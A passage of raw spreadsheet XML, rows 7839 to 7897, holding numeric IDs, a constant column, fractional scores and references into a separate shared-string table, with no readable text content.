        <v>13461</v>
      </c>
      <c r="G7839" t="s">
        <v>15504</v>
      </c>
      <c r="H7839" t="s">
        <v>15090</v>
      </c>
    </row>
    <row r="7840" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7840" s="1">
        <v>7838</v>
      </c>
      <c r="B7840">
        <v>2659</v>
      </c>
      <c r="C7840">
        <v>2659</v>
      </c>
      <c r="D7840">
        <v>4</v>
      </c>
      <c r="E7840">
        <v>0.8596000075340271</v>
      </c>
      <c r="F7840" t="s">
        <v>13461</v>
      </c>
      <c r="G7840" t="s">
        <v>15505</v>
      </c>
      <c r="H7840" t="s">
        <v>15506</v>
      </c>
    </row>
    <row r="7841" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7841" s="1">
        <v>7839</v>
      </c>
      <c r="B7841">
        <v>2661</v>
      </c>
      <c r="C7841">
        <v>2661</v>
      </c>
      <c r="D7841">
        <v>4</v>
      </c>
      <c r="E7841">
        <v>0.91490000486373901</v>
      </c>
      <c r="F7841" t="s">
        <v>13461</v>
      </c>
      <c r="G7841" t="s">
        <v>15507</v>
      </c>
      <c r="H7841" t="s">
        <v>15508</v>
      </c>
    </row>
    <row r="7842" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7842" s="1">
        <v>7840</v>
      </c>
      <c r="B7842">
        <v>2676</v>
      </c>
      <c r="C7842">
        <v>2676</v>
      </c>
      <c r="D7842">
        <v>4</v>
      </c>
      <c r="E7842">
        <v>0.77710002660751343</v>
      </c>
      <c r="F7842" t="s">
        <v>13461</v>
      </c>
      <c r="G7842" t="s">
        <v>15509</v>
      </c>
      <c r="H7842" t="s">
        <v>15510</v>
      </c>
    </row>
    <row r="7843" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7843" s="1">
        <v>7841</v>
      </c>
      <c r="B7843">
        <v>2677</v>
      </c>
      <c r="C7843">
        <v>2677</v>
      </c>
      <c r="D7843">
        <v>4</v>
      </c>
      <c r="E7843">
        <v>0.63840001821517944</v>
      </c>
      <c r="F7843" t="s">
        <v>13461</v>
      </c>
      <c r="G7843" t="s">
        <v>15511</v>
      </c>
      <c r="H7843" t="s">
        <v>15512</v>
      </c>
    </row>
    <row r="7844" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7844" s="1">
        <v>7842</v>
      </c>
      <c r="B7844">
        <v>2680</v>
      </c>
      <c r="C7844">
        <v>2680</v>
      </c>
      <c r="D7844">
        <v>4</v>
      </c>
      <c r="E7844">
        <v>0.67960000038146973</v>
      </c>
      <c r="F7844" t="s">
        <v>13461</v>
      </c>
      <c r="G7844" t="s">
        <v>15513</v>
      </c>
      <c r="H7844" t="s">
        <v>15514</v>
      </c>
    </row>
    <row r="7845" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7845" s="1">
        <v>7843</v>
      </c>
      <c r="B7845">
        <v>2681</v>
      </c>
      <c r="C7845">
        <v>2681</v>
      </c>
      <c r="D7845">
        <v>4</v>
      </c>
      <c r="E7845">
        <v>0.99870002269744873</v>
      </c>
      <c r="F7845" t="s">
        <v>13461</v>
      </c>
      <c r="G7845" t="s">
        <v>15515</v>
      </c>
      <c r="H7845" t="s">
        <v>15516</v>
      </c>
    </row>
    <row r="7846" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7846" s="1">
        <v>7844</v>
      </c>
      <c r="B7846">
        <v>2682</v>
      </c>
      <c r="C7846">
        <v>2682</v>
      </c>
      <c r="D7846">
        <v>4</v>
      </c>
      <c r="E7846">
        <v>0.78759998083114624</v>
      </c>
      <c r="F7846" t="s">
        <v>13461</v>
      </c>
      <c r="G7846" t="s">
        <v>15517</v>
      </c>
      <c r="H7846" t="s">
        <v>15518</v>
      </c>
    </row>
    <row r="7847" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7847" s="1">
        <v>7845</v>
      </c>
      <c r="B7847">
        <v>2688</v>
      </c>
      <c r="C7847">
        <v>2688</v>
      </c>
      <c r="D7847">
        <v>4</v>
      </c>
      <c r="E7847">
        <v>0.51059997081756592</v>
      </c>
      <c r="F7847" t="s">
        <v>13461</v>
      </c>
      <c r="G7847" t="s">
        <v>15519</v>
      </c>
      <c r="H7847" t="s">
        <v>15520</v>
      </c>
    </row>
    <row r="7848" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7848" s="1">
        <v>7846</v>
      </c>
      <c r="B7848">
        <v>2655</v>
      </c>
      <c r="C7848">
        <v>2655</v>
      </c>
      <c r="D7848">
        <v>4</v>
      </c>
      <c r="E7848">
        <v>0.75099998712539673</v>
      </c>
      <c r="F7848" t="s">
        <v>13461</v>
      </c>
      <c r="G7848" t="s">
        <v>15521</v>
      </c>
      <c r="H7848" t="s">
        <v>15522</v>
      </c>
    </row>
    <row r="7849" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7849" s="1">
        <v>7847</v>
      </c>
      <c r="B7849">
        <v>6725</v>
      </c>
      <c r="C7849">
        <v>6725</v>
      </c>
      <c r="D7849">
        <v>4</v>
      </c>
      <c r="E7849">
        <v>0.99889999628067017</v>
      </c>
      <c r="F7849" t="s">
        <v>13461</v>
      </c>
      <c r="G7849" t="s">
        <v>15523</v>
      </c>
      <c r="H7849" t="s">
        <v>15524</v>
      </c>
    </row>
    <row r="7850" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7850" s="1">
        <v>7848</v>
      </c>
      <c r="B7850">
        <v>6721</v>
      </c>
      <c r="C7850">
        <v>6721</v>
      </c>
      <c r="D7850">
        <v>4</v>
      </c>
      <c r="E7850">
        <v>0.38999998569488531</v>
      </c>
      <c r="F7850" t="s">
        <v>13461</v>
      </c>
      <c r="G7850" t="s">
        <v>15525</v>
      </c>
      <c r="H7850" t="s">
        <v>15526</v>
      </c>
    </row>
    <row r="7851" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7851" s="1">
        <v>7849</v>
      </c>
      <c r="B7851">
        <v>2702</v>
      </c>
      <c r="C7851">
        <v>2702</v>
      </c>
      <c r="D7851">
        <v>4</v>
      </c>
      <c r="E7851">
        <v>0.97790002822875977</v>
      </c>
      <c r="F7851" t="s">
        <v>13461</v>
      </c>
      <c r="G7851" t="s">
        <v>15527</v>
      </c>
      <c r="H7851" t="s">
        <v>15528</v>
      </c>
    </row>
    <row r="7852" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7852" s="1">
        <v>7850</v>
      </c>
      <c r="B7852">
        <v>6719</v>
      </c>
      <c r="C7852">
        <v>6719</v>
      </c>
      <c r="D7852">
        <v>4</v>
      </c>
      <c r="E7852">
        <v>0.99870002269744873</v>
      </c>
      <c r="F7852" t="s">
        <v>13461</v>
      </c>
      <c r="G7852" t="s">
        <v>15529</v>
      </c>
      <c r="H7852" t="s">
        <v>15530</v>
      </c>
    </row>
    <row r="7853" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7853" s="1">
        <v>7851</v>
      </c>
      <c r="B7853">
        <v>2710</v>
      </c>
      <c r="C7853">
        <v>2710</v>
      </c>
      <c r="D7853">
        <v>4</v>
      </c>
      <c r="E7853">
        <v>0.73869997262954712</v>
      </c>
      <c r="F7853" t="s">
        <v>13461</v>
      </c>
      <c r="G7853" t="s">
        <v>15531</v>
      </c>
      <c r="H7853" t="s">
        <v>15532</v>
      </c>
    </row>
    <row r="7854" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7854" s="1">
        <v>7852</v>
      </c>
      <c r="B7854">
        <v>2718</v>
      </c>
      <c r="C7854">
        <v>2718</v>
      </c>
      <c r="D7854">
        <v>4</v>
      </c>
      <c r="E7854">
        <v>0.73739999532699585</v>
      </c>
      <c r="F7854" t="s">
        <v>13461</v>
      </c>
      <c r="G7854" t="s">
        <v>15533</v>
      </c>
      <c r="H7854" t="s">
        <v>15534</v>
      </c>
    </row>
    <row r="7855" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7855" s="1">
        <v>7853</v>
      </c>
      <c r="B7855">
        <v>2735</v>
      </c>
      <c r="C7855">
        <v>2735</v>
      </c>
      <c r="D7855">
        <v>4</v>
      </c>
      <c r="E7855">
        <v>0.85130000114440918</v>
      </c>
      <c r="F7855" t="s">
        <v>13461</v>
      </c>
      <c r="G7855" t="s">
        <v>15535</v>
      </c>
      <c r="H7855" t="s">
        <v>15536</v>
      </c>
    </row>
    <row r="7856" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7856" s="1">
        <v>7854</v>
      </c>
      <c r="B7856">
        <v>2739</v>
      </c>
      <c r="C7856">
        <v>2739</v>
      </c>
      <c r="D7856">
        <v>4</v>
      </c>
      <c r="E7856">
        <v>0.79000002145767212</v>
      </c>
      <c r="F7856" t="s">
        <v>13461</v>
      </c>
      <c r="G7856" t="s">
        <v>15537</v>
      </c>
      <c r="H7856" t="s">
        <v>15538</v>
      </c>
    </row>
    <row r="7857" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7857" s="1">
        <v>7855</v>
      </c>
      <c r="B7857">
        <v>2740</v>
      </c>
      <c r="C7857">
        <v>2740</v>
      </c>
      <c r="D7857">
        <v>4</v>
      </c>
      <c r="E7857">
        <v>0.84500002861022949</v>
      </c>
      <c r="F7857" t="s">
        <v>13461</v>
      </c>
      <c r="G7857" t="s">
        <v>15539</v>
      </c>
      <c r="H7857" t="s">
        <v>15540</v>
      </c>
    </row>
    <row r="7858" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7858" s="1">
        <v>7856</v>
      </c>
      <c r="B7858">
        <v>2742</v>
      </c>
      <c r="C7858">
        <v>2742</v>
      </c>
      <c r="D7858">
        <v>4</v>
      </c>
      <c r="E7858">
        <v>0.40799999237060552</v>
      </c>
      <c r="F7858" t="s">
        <v>13461</v>
      </c>
      <c r="G7858" t="s">
        <v>15541</v>
      </c>
      <c r="H7858" t="s">
        <v>15542</v>
      </c>
    </row>
    <row r="7859" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7859" s="1">
        <v>7857</v>
      </c>
      <c r="B7859">
        <v>6724</v>
      </c>
      <c r="C7859">
        <v>6724</v>
      </c>
      <c r="D7859">
        <v>4</v>
      </c>
      <c r="E7859">
        <v>0.99779999256134033</v>
      </c>
      <c r="F7859" t="s">
        <v>13461</v>
      </c>
      <c r="G7859" t="s">
        <v>15543</v>
      </c>
      <c r="H7859" t="s">
        <v>15544</v>
      </c>
    </row>
    <row r="7860" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7860" s="1">
        <v>7858</v>
      </c>
      <c r="B7860">
        <v>2743</v>
      </c>
      <c r="C7860">
        <v>2743</v>
      </c>
      <c r="D7860">
        <v>4</v>
      </c>
      <c r="E7860">
        <v>0.99650001525878906</v>
      </c>
      <c r="F7860" t="s">
        <v>13461</v>
      </c>
      <c r="G7860" t="s">
        <v>15545</v>
      </c>
      <c r="H7860" t="s">
        <v>15546</v>
      </c>
    </row>
    <row r="7861" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7861" s="1">
        <v>7859</v>
      </c>
      <c r="B7861">
        <v>6748</v>
      </c>
      <c r="C7861">
        <v>6748</v>
      </c>
      <c r="D7861">
        <v>4</v>
      </c>
      <c r="E7861">
        <v>0.72960001230239868</v>
      </c>
      <c r="F7861" t="s">
        <v>13461</v>
      </c>
      <c r="G7861" t="s">
        <v>15547</v>
      </c>
      <c r="H7861" t="s">
        <v>15548</v>
      </c>
    </row>
    <row r="7862" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7862" s="1">
        <v>7860</v>
      </c>
      <c r="B7862">
        <v>6756</v>
      </c>
      <c r="C7862">
        <v>6756</v>
      </c>
      <c r="D7862">
        <v>4</v>
      </c>
      <c r="E7862">
        <v>0.53149998188018799</v>
      </c>
      <c r="F7862" t="s">
        <v>13461</v>
      </c>
      <c r="G7862" t="s">
        <v>15549</v>
      </c>
      <c r="H7862" t="s">
        <v>15550</v>
      </c>
    </row>
    <row r="7863" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7863" s="1">
        <v>7861</v>
      </c>
      <c r="B7863">
        <v>6811</v>
      </c>
      <c r="C7863">
        <v>6811</v>
      </c>
      <c r="D7863">
        <v>4</v>
      </c>
      <c r="E7863">
        <v>0.79500001668930054</v>
      </c>
      <c r="F7863" t="s">
        <v>13461</v>
      </c>
      <c r="G7863" t="s">
        <v>15551</v>
      </c>
      <c r="H7863" t="s">
        <v>15552</v>
      </c>
    </row>
    <row r="7864" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7864" s="1">
        <v>7862</v>
      </c>
      <c r="B7864">
        <v>2500</v>
      </c>
      <c r="C7864">
        <v>2500</v>
      </c>
      <c r="D7864">
        <v>4</v>
      </c>
      <c r="E7864">
        <v>0.51740002632141113</v>
      </c>
      <c r="F7864" t="s">
        <v>13461</v>
      </c>
      <c r="G7864" t="s">
        <v>15553</v>
      </c>
      <c r="H7864" t="s">
        <v>15554</v>
      </c>
    </row>
    <row r="7865" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7865" s="1">
        <v>7863</v>
      </c>
      <c r="B7865">
        <v>2501</v>
      </c>
      <c r="C7865">
        <v>2501</v>
      </c>
      <c r="D7865">
        <v>4</v>
      </c>
      <c r="E7865">
        <v>0.80290001630783081</v>
      </c>
      <c r="F7865" t="s">
        <v>13461</v>
      </c>
      <c r="G7865" t="s">
        <v>15555</v>
      </c>
      <c r="H7865" t="s">
        <v>15556</v>
      </c>
    </row>
    <row r="7866" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7866" s="1">
        <v>7864</v>
      </c>
      <c r="B7866">
        <v>2505</v>
      </c>
      <c r="C7866">
        <v>2505</v>
      </c>
      <c r="D7866">
        <v>4</v>
      </c>
      <c r="E7866">
        <v>0.60159999132156372</v>
      </c>
      <c r="F7866" t="s">
        <v>13461</v>
      </c>
      <c r="G7866" t="s">
        <v>15557</v>
      </c>
      <c r="H7866" t="s">
        <v>15558</v>
      </c>
    </row>
    <row r="7867" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7867" s="1">
        <v>7865</v>
      </c>
      <c r="B7867">
        <v>6800</v>
      </c>
      <c r="C7867">
        <v>6800</v>
      </c>
      <c r="D7867">
        <v>4</v>
      </c>
      <c r="E7867">
        <v>0.97039997577667236</v>
      </c>
      <c r="F7867" t="s">
        <v>13461</v>
      </c>
      <c r="G7867" t="s">
        <v>15559</v>
      </c>
      <c r="H7867" t="s">
        <v>15560</v>
      </c>
    </row>
    <row r="7868" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7868" s="1">
        <v>7866</v>
      </c>
      <c r="B7868">
        <v>6798</v>
      </c>
      <c r="C7868">
        <v>6798</v>
      </c>
      <c r="D7868">
        <v>4</v>
      </c>
      <c r="E7868">
        <v>0.7839999794960022</v>
      </c>
      <c r="F7868" t="s">
        <v>13461</v>
      </c>
      <c r="G7868" t="s">
        <v>15561</v>
      </c>
      <c r="H7868" t="s">
        <v>15562</v>
      </c>
    </row>
    <row r="7869" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7869" s="1">
        <v>7867</v>
      </c>
      <c r="B7869">
        <v>2507</v>
      </c>
      <c r="C7869">
        <v>2507</v>
      </c>
      <c r="D7869">
        <v>4</v>
      </c>
      <c r="E7869">
        <v>0.62159997224807739</v>
      </c>
      <c r="F7869" t="s">
        <v>13461</v>
      </c>
      <c r="G7869" t="s">
        <v>15563</v>
      </c>
      <c r="H7869" t="s">
        <v>15564</v>
      </c>
    </row>
    <row r="7870" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7870" s="1">
        <v>7868</v>
      </c>
      <c r="B7870">
        <v>2514</v>
      </c>
      <c r="C7870">
        <v>2514</v>
      </c>
      <c r="D7870">
        <v>4</v>
      </c>
      <c r="E7870">
        <v>0.89499998092651367</v>
      </c>
      <c r="F7870" t="s">
        <v>13461</v>
      </c>
      <c r="G7870" t="s">
        <v>15565</v>
      </c>
      <c r="H7870" t="s">
        <v>15566</v>
      </c>
    </row>
    <row r="7871" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7871" s="1">
        <v>7869</v>
      </c>
      <c r="B7871">
        <v>2542</v>
      </c>
      <c r="C7871">
        <v>2542</v>
      </c>
      <c r="D7871">
        <v>4</v>
      </c>
      <c r="E7871">
        <v>0.64499998092651367</v>
      </c>
      <c r="F7871" t="s">
        <v>13461</v>
      </c>
      <c r="G7871" t="s">
        <v>15567</v>
      </c>
      <c r="H7871" t="s">
        <v>15568</v>
      </c>
    </row>
    <row r="7872" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7872" s="1">
        <v>7870</v>
      </c>
      <c r="B7872">
        <v>6753</v>
      </c>
      <c r="C7872">
        <v>6753</v>
      </c>
      <c r="D7872">
        <v>4</v>
      </c>
      <c r="E7872">
        <v>0.81699997186660767</v>
      </c>
      <c r="F7872" t="s">
        <v>13461</v>
      </c>
      <c r="G7872" t="s">
        <v>15569</v>
      </c>
      <c r="H7872" t="s">
        <v>15570</v>
      </c>
    </row>
    <row r="7873" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7873" s="1">
        <v>7871</v>
      </c>
      <c r="B7873">
        <v>6786</v>
      </c>
      <c r="C7873">
        <v>6786</v>
      </c>
      <c r="D7873">
        <v>4</v>
      </c>
      <c r="E7873">
        <v>0.53659999370574951</v>
      </c>
      <c r="F7873" t="s">
        <v>13461</v>
      </c>
      <c r="G7873" t="s">
        <v>15571</v>
      </c>
      <c r="H7873" t="s">
        <v>15572</v>
      </c>
    </row>
    <row r="7874" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7874" s="1">
        <v>7872</v>
      </c>
      <c r="B7874">
        <v>2589</v>
      </c>
      <c r="C7874">
        <v>2589</v>
      </c>
      <c r="D7874">
        <v>4</v>
      </c>
      <c r="E7874">
        <v>0.99889999628067017</v>
      </c>
      <c r="F7874" t="s">
        <v>13461</v>
      </c>
      <c r="G7874" t="s">
        <v>15573</v>
      </c>
      <c r="H7874" t="s">
        <v>15574</v>
      </c>
    </row>
    <row r="7875" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7875" s="1">
        <v>7873</v>
      </c>
      <c r="B7875">
        <v>6768</v>
      </c>
      <c r="C7875">
        <v>6768</v>
      </c>
      <c r="D7875">
        <v>4</v>
      </c>
      <c r="E7875">
        <v>0.99779999256134033</v>
      </c>
      <c r="F7875" t="s">
        <v>13461</v>
      </c>
      <c r="G7875" t="s">
        <v>15575</v>
      </c>
      <c r="H7875" t="s">
        <v>15576</v>
      </c>
    </row>
    <row r="7876" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7876" s="1">
        <v>7874</v>
      </c>
      <c r="B7876">
        <v>2618</v>
      </c>
      <c r="C7876">
        <v>2618</v>
      </c>
      <c r="D7876">
        <v>4</v>
      </c>
      <c r="E7876">
        <v>0.99830001592636108</v>
      </c>
      <c r="F7876" t="s">
        <v>13461</v>
      </c>
      <c r="G7876" t="s">
        <v>15577</v>
      </c>
      <c r="H7876" t="s">
        <v>15578</v>
      </c>
    </row>
    <row r="7877" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7877" s="1">
        <v>7875</v>
      </c>
      <c r="B7877">
        <v>2621</v>
      </c>
      <c r="C7877">
        <v>2621</v>
      </c>
      <c r="D7877">
        <v>4</v>
      </c>
      <c r="E7877">
        <v>0.75300002098083496</v>
      </c>
      <c r="F7877" t="s">
        <v>13461</v>
      </c>
      <c r="G7877" t="s">
        <v>15579</v>
      </c>
      <c r="H7877" t="s">
        <v>15580</v>
      </c>
    </row>
    <row r="7878" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7878" s="1">
        <v>7876</v>
      </c>
      <c r="B7878">
        <v>2623</v>
      </c>
      <c r="C7878">
        <v>2623</v>
      </c>
      <c r="D7878">
        <v>4</v>
      </c>
      <c r="E7878">
        <v>0.9966999888420105</v>
      </c>
      <c r="F7878" t="s">
        <v>13461</v>
      </c>
      <c r="G7878" t="s">
        <v>15581</v>
      </c>
      <c r="H7878" t="s">
        <v>15582</v>
      </c>
    </row>
    <row r="7879" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7879" s="1">
        <v>7877</v>
      </c>
      <c r="B7879">
        <v>2626</v>
      </c>
      <c r="C7879">
        <v>2626</v>
      </c>
      <c r="D7879">
        <v>4</v>
      </c>
      <c r="E7879">
        <v>0.53960001468658447</v>
      </c>
      <c r="F7879" t="s">
        <v>13461</v>
      </c>
      <c r="G7879" t="s">
        <v>15583</v>
      </c>
      <c r="H7879" t="s">
        <v>15584</v>
      </c>
    </row>
    <row r="7880" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7880" s="1">
        <v>7878</v>
      </c>
      <c r="B7880">
        <v>2629</v>
      </c>
      <c r="C7880">
        <v>2629</v>
      </c>
      <c r="D7880">
        <v>4</v>
      </c>
      <c r="E7880">
        <v>0.82389998435974121</v>
      </c>
      <c r="F7880" t="s">
        <v>13461</v>
      </c>
      <c r="G7880" t="s">
        <v>15585</v>
      </c>
      <c r="H7880" t="s">
        <v>15586</v>
      </c>
    </row>
    <row r="7881" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7881" s="1">
        <v>7879</v>
      </c>
      <c r="B7881">
        <v>2633</v>
      </c>
      <c r="C7881">
        <v>2633</v>
      </c>
      <c r="D7881">
        <v>4</v>
      </c>
      <c r="E7881">
        <v>0.57599997520446777</v>
      </c>
      <c r="F7881" t="s">
        <v>13461</v>
      </c>
      <c r="G7881" t="s">
        <v>15587</v>
      </c>
      <c r="H7881" t="s">
        <v>15588</v>
      </c>
    </row>
    <row r="7882" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7882" s="1">
        <v>7880</v>
      </c>
      <c r="B7882">
        <v>2634</v>
      </c>
      <c r="C7882">
        <v>2634</v>
      </c>
      <c r="D7882">
        <v>4</v>
      </c>
      <c r="E7882">
        <v>0.8629000186920166</v>
      </c>
      <c r="F7882" t="s">
        <v>13461</v>
      </c>
      <c r="G7882" t="s">
        <v>15589</v>
      </c>
      <c r="H7882" t="s">
        <v>15590</v>
      </c>
    </row>
    <row r="7883" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7883" s="1">
        <v>7881</v>
      </c>
      <c r="B7883">
        <v>2582</v>
      </c>
      <c r="C7883">
        <v>2582</v>
      </c>
      <c r="D7883">
        <v>4</v>
      </c>
      <c r="E7883">
        <v>0.72619998455047607</v>
      </c>
      <c r="F7883" t="s">
        <v>13461</v>
      </c>
      <c r="G7883" t="s">
        <v>15591</v>
      </c>
      <c r="H7883" t="s">
        <v>15592</v>
      </c>
    </row>
    <row r="7884" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7884" s="1">
        <v>7882</v>
      </c>
      <c r="B7884">
        <v>2748</v>
      </c>
      <c r="C7884">
        <v>2748</v>
      </c>
      <c r="D7884">
        <v>4</v>
      </c>
      <c r="E7884">
        <v>0.77380001544952393</v>
      </c>
      <c r="F7884" t="s">
        <v>13461</v>
      </c>
      <c r="G7884" t="s">
        <v>15593</v>
      </c>
      <c r="H7884" t="s">
        <v>15594</v>
      </c>
    </row>
    <row r="7885" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7885" s="1">
        <v>7883</v>
      </c>
      <c r="B7885">
        <v>2750</v>
      </c>
      <c r="C7885">
        <v>2750</v>
      </c>
      <c r="D7885">
        <v>4</v>
      </c>
      <c r="E7885">
        <v>0.75199997425079346</v>
      </c>
      <c r="F7885" t="s">
        <v>13461</v>
      </c>
      <c r="G7885" t="s">
        <v>15595</v>
      </c>
      <c r="H7885" t="s">
        <v>15596</v>
      </c>
    </row>
    <row r="7886" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7886" s="1">
        <v>7884</v>
      </c>
      <c r="B7886">
        <v>2780</v>
      </c>
      <c r="C7886">
        <v>2780</v>
      </c>
      <c r="D7886">
        <v>4</v>
      </c>
      <c r="E7886">
        <v>0.54989999532699585</v>
      </c>
      <c r="F7886" t="s">
        <v>13461</v>
      </c>
      <c r="G7886" t="s">
        <v>15597</v>
      </c>
      <c r="H7886" t="s">
        <v>15598</v>
      </c>
    </row>
    <row r="7887" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7887" s="1">
        <v>7885</v>
      </c>
      <c r="B7887">
        <v>6640</v>
      </c>
      <c r="C7887">
        <v>6640</v>
      </c>
      <c r="D7887">
        <v>4</v>
      </c>
      <c r="E7887">
        <v>0.97259998321533203</v>
      </c>
      <c r="F7887" t="s">
        <v>13461</v>
      </c>
      <c r="G7887" t="s">
        <v>15599</v>
      </c>
      <c r="H7887" t="s">
        <v>15600</v>
      </c>
    </row>
    <row r="7888" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7888" s="1">
        <v>7886</v>
      </c>
      <c r="B7888">
        <v>6639</v>
      </c>
      <c r="C7888">
        <v>6639</v>
      </c>
      <c r="D7888">
        <v>4</v>
      </c>
      <c r="E7888">
        <v>0.51399999856948853</v>
      </c>
      <c r="F7888" t="s">
        <v>13461</v>
      </c>
      <c r="G7888" t="s">
        <v>15601</v>
      </c>
      <c r="H7888" t="s">
        <v>15602</v>
      </c>
    </row>
    <row r="7889" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7889" s="1">
        <v>7887</v>
      </c>
      <c r="B7889">
        <v>2914</v>
      </c>
      <c r="C7889">
        <v>2914</v>
      </c>
      <c r="D7889">
        <v>4</v>
      </c>
      <c r="E7889">
        <v>0.88040000200271606</v>
      </c>
      <c r="F7889" t="s">
        <v>13461</v>
      </c>
      <c r="G7889" t="s">
        <v>15603</v>
      </c>
      <c r="H7889" t="s">
        <v>15604</v>
      </c>
    </row>
    <row r="7890" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7890" s="1">
        <v>7888</v>
      </c>
      <c r="B7890">
        <v>2915</v>
      </c>
      <c r="C7890">
        <v>2915</v>
      </c>
      <c r="D7890">
        <v>4</v>
      </c>
      <c r="E7890">
        <v>0.85920000076293945</v>
      </c>
      <c r="F7890" t="s">
        <v>13461</v>
      </c>
      <c r="G7890" t="s">
        <v>15605</v>
      </c>
      <c r="H7890" t="s">
        <v>15606</v>
      </c>
    </row>
    <row r="7891" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7891" s="1">
        <v>7889</v>
      </c>
      <c r="B7891">
        <v>6635</v>
      </c>
      <c r="C7891">
        <v>6635</v>
      </c>
      <c r="D7891">
        <v>4</v>
      </c>
      <c r="E7891">
        <v>0.58719998598098755</v>
      </c>
      <c r="F7891" t="s">
        <v>13461</v>
      </c>
      <c r="G7891" t="s">
        <v>15607</v>
      </c>
      <c r="H7891" t="s">
        <v>15608</v>
      </c>
    </row>
    <row r="7892" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7892" s="1">
        <v>7890</v>
      </c>
      <c r="B7892">
        <v>2926</v>
      </c>
      <c r="C7892">
        <v>2926</v>
      </c>
      <c r="D7892">
        <v>4</v>
      </c>
      <c r="E7892">
        <v>0.67379999160766602</v>
      </c>
      <c r="F7892" t="s">
        <v>13461</v>
      </c>
      <c r="G7892" t="s">
        <v>15609</v>
      </c>
      <c r="H7892" t="s">
        <v>15610</v>
      </c>
    </row>
    <row r="7893" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7893" s="1">
        <v>7891</v>
      </c>
      <c r="B7893">
        <v>6626</v>
      </c>
      <c r="C7893">
        <v>6626</v>
      </c>
      <c r="D7893">
        <v>4</v>
      </c>
      <c r="E7893">
        <v>0.98970001935958862</v>
      </c>
      <c r="F7893" t="s">
        <v>13461</v>
      </c>
      <c r="G7893" t="s">
        <v>15611</v>
      </c>
      <c r="H7893" t="s">
        <v>15612</v>
      </c>
    </row>
    <row r="7894" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7894" s="1">
        <v>7892</v>
      </c>
      <c r="B7894">
        <v>6625</v>
      </c>
      <c r="C7894">
        <v>6625</v>
      </c>
      <c r="D7894">
        <v>4</v>
      </c>
      <c r="E7894">
        <v>0.9968000054359436</v>
      </c>
      <c r="F7894" t="s">
        <v>13461</v>
      </c>
      <c r="G7894" t="s">
        <v>15613</v>
      </c>
      <c r="H7894" t="s">
        <v>15614</v>
      </c>
    </row>
    <row r="7895" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7895" s="1">
        <v>7893</v>
      </c>
      <c r="B7895">
        <v>6624</v>
      </c>
      <c r="C7895">
        <v>6624</v>
      </c>
      <c r="D7895">
        <v>4</v>
      </c>
      <c r="E7895">
        <v>0.86180001497268677</v>
      </c>
      <c r="F7895" t="s">
        <v>13461</v>
      </c>
      <c r="G7895" t="s">
        <v>15615</v>
      </c>
      <c r="H7895" t="s">
        <v>15501</v>
      </c>
    </row>
    <row r="7896" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7896" s="1">
        <v>7894</v>
      </c>
      <c r="B7896">
        <v>2912</v>
      </c>
      <c r="C7896">
        <v>2912</v>
      </c>
      <c r="D7896">
        <v>4</v>
      </c>
      <c r="E7896">
        <v>0.53810000419616699</v>
      </c>
      <c r="F7896" t="s">
        <v>13461</v>
      </c>
      <c r="G7896" t="s">
        <v>15616</v>
      </c>
      <c r="H7896" t="s">
        <v>15617</v>
      </c>
    </row>
    <row r="7897" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7897" s="1">
        <v>7895</v>
      </c>
      <c r="B7897">
        <v>6622</v>
      </c>
      <c r="C7897">
        <v>6622</v>
      </c>
      <c r="D7897">
        <v>4</v>
      </c>
      <c r="E7897">
        <v>0.89899998903274536</v>
      </c>
      <c r="F7897" t="s">
        <v>13461</v>
      </c>
      <c r="G7897" t="s">
        <v>15618</v>
      </c>
      <c r="H7897" t="s">
        <v>15619</v>
      </c>
    </row>
